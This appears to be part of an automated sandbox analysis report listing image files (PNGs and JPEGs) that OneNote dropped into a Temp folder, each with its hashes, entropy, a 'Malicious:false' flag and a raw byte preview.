                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{73393CE8-01D6-4E08-9E23-CC72BD2C986D}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 70x626, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3428
                                                                                                                                                                                                                  Entropy (8bit):7.766473352510893
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:/hdu7isPwAp7zesusUyYAatNG87llTONQYS:5di5tfuQ9atNZlaC
                                                                                                                                                                                                                  MD5:EE9E2DF458733B61333E8A82F7A2613D
                                                                                                                                                                                                                  SHA1:A86704C969F51B86D6A05ED51C6C60214ED9FA89
                                                                                                                                                                                                                  SHA-256:BE4F0E6C89FCE91B9EBD2623567F7DFC259E0E3C77C9158742B8F64B724DF673
                                                                                                                                                                                                                  SHA-512:BFB5D6DD6B66EE21E946E90D1E482384CD10244308562DDA814189602681DADDE5752B80519E5B8515F115A71BD6BB4317A59BE65B8B5E3474AED119F8303569
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......r.F.."........................................H............................!Qaq.."12.....#3ARbr...$B...cd...&CSu.....................................+.......................12..aAQ.!#q.."................?...#...3.Za......rV.5&...../"..i.t...j..W........d.FL.V.2K....]t.f.d.NK..:.....f...... ......2.[...#..D...ZK....p.z.E.N..T..L.-....1....2.\.6FIr2..zS\U#..........fB\t..5J..~q...D....A.......!....MY..../.HY..../e.M.Y.n.~..,....'..Pc...l...d2..m.f.it$..qx-z*...._..].cOO....n..&.....FIA.....2J2..d:<qc..6.I.G.N....f.K..Dx.-.......`....2.FZ."K7.r}..<.P.Z.da.Y.....8..s....G.....b.e..g .S.......FL.Z,&..q.MG.J+..x\..m...qN=.....)..`...&Y...S....u6{.z.g.....@......FL.ZL&.Iv.w..8....U..v...*.q.B.v_./A..#.#.g.j........*J;...u...W.Ao...%....#$.....M..^\{W.SO...s,.N.....c).,.B.Gv...."k..z."..S]H.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{74A9E448-6A66-492B-9BE2-D3B6F632D7AA}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1248x1624, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):49224
                                                                                                                                                                                                                  Entropy (8bit):7.402134460714453
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:orJJmT4HVnteV4FrdMiYcx7bfCb6HPdnX2:EvSMVnte8ZP1Y6Jm
                                                                                                                                                                                                                  MD5:B7FC313714EDD7866F4C76527282C2B5
                                                                                                                                                                                                                  SHA1:C86217B46956933FAE4A30483A63B33F34B8C503
                                                                                                                                                                                                                  SHA-256:B6D25F5EB52D5C24EF6C325BD25F18E413F3E23D20413A3693749275BA4B192C
                                                                                                                                                                                                                  SHA-512:038A73B7A69DD976C964F1538F5B4F7C6C64721E4F2F1A831815598FAAE84CAC53305C03F5CEA6E66ACDC110A9A5117EEE191345EA004B9576C752122F8D88F7
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......Exif..II*.................Ducky.......-.....+http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:CFCF3A6CA8A811EDBBF3936CDCD6FAAD" xmpMM:DocumentID="xmp.did:CFCF3A6DA8A811EDBBF3936CDCD6FAAD"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:CFCF3A6AA8A811EDBBF3936CDCD6FAAD" stRef:documentID="xmp.did:CFCF3A6BA8A811EDBBF3936CDCD6FAAD"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d....................................................... ..,+++,1111111111............................................!!..!!))())

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{75BFE402-C7C2-4415-BF57-385FBB409B64}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4081
                                                                                                                                                                                                                  Entropy (8bit):7.943373267196131
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                                                                                                  MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                                                                                                  SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                                                                                                  SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                                                                                                  SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{760C5FC1-6BAC-4070-BD66-4DC3C4BB8F4F}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:44:07], progressive, precision 8, 611x163, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):36740
                                                                                                                                                                                                                  Entropy (8bit):7.48266872907324
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:3nwDxjTvoE0Rjwit4rjucDILWg7/Da0JgGQ8e1S8SA/Khos0:SxjTmZw7nucDILj77a0JgGQvScb
                                                                                                                                                                                                                  MD5:9C205C8D770516C5AA70D31B2CA00AF3
                                                                                                                                                                                                                  SHA1:9A1002F0CF7F92F1BE2BB25BAD61CEBFAC282482
                                                                                                                                                                                                                  SHA-256:E111F96490755C7D71E87C88ACAEA38AFE55BB865B1A14A83C5BD239648D5E2C
                                                                                                                                                                                                                  SHA-512:A3E105208B32831265428572B0937DD3C17B793D8611B2DA8D4939F1BEC6050999D375E3F6B87D53AD49DFA0EAE737B0141D37597AA42116C310761973D4A134
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:44:07............................c.........................................................(.....................&...........n.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d................................................................................................................................................."...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..o...4.gP.~.c...K{...V.=...].<.........vS.........s....(.t......X......kk7....~-...yF}^c.Z.\.G./.?t...>....:.>......./.ib..).

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{77801A6C-A7FA-4397-8B01-91153C8630B7}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 814x105, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):12654
                                                                                                                                                                                                                  Entropy (8bit):7.745439197485533
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:JheN2cq6MLu6MLGu54cHeNzhcmhcDu53eNE3UPkhrxvu:Ji2Wix7fzVsbE3Zm
                                                                                                                                                                                                                  MD5:4BCCCDBB4273ECEBE216C84930A8D0B2
                                                                                                                                                                                                                  SHA1:FFBF617787E27BC94D9BAF89F2FE34A2BD42794B
                                                                                                                                                                                                                  SHA-256:474F9A8C25D5E21192315397EA995B1E11E2C1608157C6E0277688091BFD136A
                                                                                                                                                                                                                  SHA-512:DAD73A8C0E293B88685C0C71EF15E0DC95EE39B7FC9F849DE5D634173FD9FA0AF0AA96742D9E94BE03556AA4A817D5001C95A6736EAD5D5DF03661876785EB74
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....H.H.....C....................................................................C.......................................................................i..............................................E.....................U....V...f..ASTc.......de.1Qq...!Rb....Ca."r.................................B....................b....Ra.....!Qc.....AS.1U.."C...2Bq...$#3%&.............?......3.....~......:..g..s"......:..g..s"..ic..Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. ..0...Q_..X..V5E~..c..X...@u...cTW...0...Q_..;.m.....@w...Q.+....*.4W...lUFh....v..._..wn...dW....y._..v..E~...*...@wn...dW....y._...v..U..@wn...d..{`;.|U.2g...*.3...:.0?ViN.z.@w...4.M.:m..`~..i7...q...I....J.`l...W..n..PQTiB...6....+..sj.*."...6....+..WA...x..A........(.N6`..AD.q.....'S...t.Q:.l.......f.]..N..0.. .u8..A........_W..Y...}.C...~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~.v..?U..^.r..}..Bep

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{79D68AD4-8DA8-479F-91FB-647E9499AD4B}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11332
                                                                                                                                                                                                                  Entropy (8bit):7.9324721568775285
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                                                                                                  MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                                                                                                  SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                                                                                                  SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                                                                                                  SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{79FC03C5-2C4D-4613-B694-D3B8B6D34ED6}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3879
                                                                                                                                                                                                                  Entropy (8bit):7.9281351307465044
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                                                                                  MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                                                                                  SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                                                                                  SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                                                                                  SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{7A808603-1F44-4820-83E1-F44443E4E08E}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{7AA06F0C-436D-4316-9A0F-548505B9CFAE}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13030
                                                                                                                                                                                                                  Entropy (8bit):7.948664903731204
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                                                                                  MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                                                                                  SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                                                                                  SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                                                                                  SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{7B748D5B-27B2-42AB-85AE-AC9CC02B4E29}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):567
                                                                                                                                                                                                                  Entropy (8bit):7.499095532051442
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:6v/7iQug6mbURgVowGtrjzeC/Gl2QL26YnQQNZTw61VeDp:PRgVqtrjSC/MJ26YQot3E
                                                                                                                                                                                                                  MD5:D055CE625528E448C61315EAAEF5BB71
                                                                                                                                                                                                                  SHA1:029DF4C872B1C154F32E7FE94F434547C3BA6192
                                                                                                                                                                                                                  SHA-256:85BF1E672B4E86E9AF0C7874681EC9620DFDC78E0335B83EEF38C17D813B6705
                                                                                                                                                                                                                  SHA-512:705B6B729E967FA946469571109AA892F5CB55A01C74D40AE02140D10CBF9B65DD5E511C06EBFE494E407742F8C6F4FBBE88664B78B37ABFB2F19DB1F66F4247
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR... ... .....szz.....sRGB.........pHYs..........o.d....IDATXG.V... ..7.^z....d},C...X.Zg.J..f..LA=1....9.9.....Oq.........Y..8.eYB.....y.-.....-..lh.ueM...:l..M.h..Z.d5..........e.Av....(..B...~..u.....Z6..x.[.p.x.{|..cb....J....j.O........{..[.DW..k..].m..%pD...<5..u...2....Y...F.B...............x.cb.....r.....c.HS..Dk....a.$v_a....2a....Up.....V.`.D+..B..t;FcBs..^......R.mT.).V;n.$.29..KM....Z..w.s'....@i@./..h..6..P.Z...a....2.....".z... @......P>..{.....3I.:P2..z{v&.B.....+.......G.>4.....}.#.m..9...|...a<!..d....IEND.B`.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{7C4A2EA7-2F13-4E90-A898-638B1E91F36B}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{7CE75506-28BE-4F40-9220-95AAD3DBE3CD}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1924
                                                                                                                                                                                                                  Entropy (8bit):7.836744258175623
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                                                                                                  MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                                                                                                  SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                                                                                                  SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                                                                                                  SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                                                                                                  Malicious:false
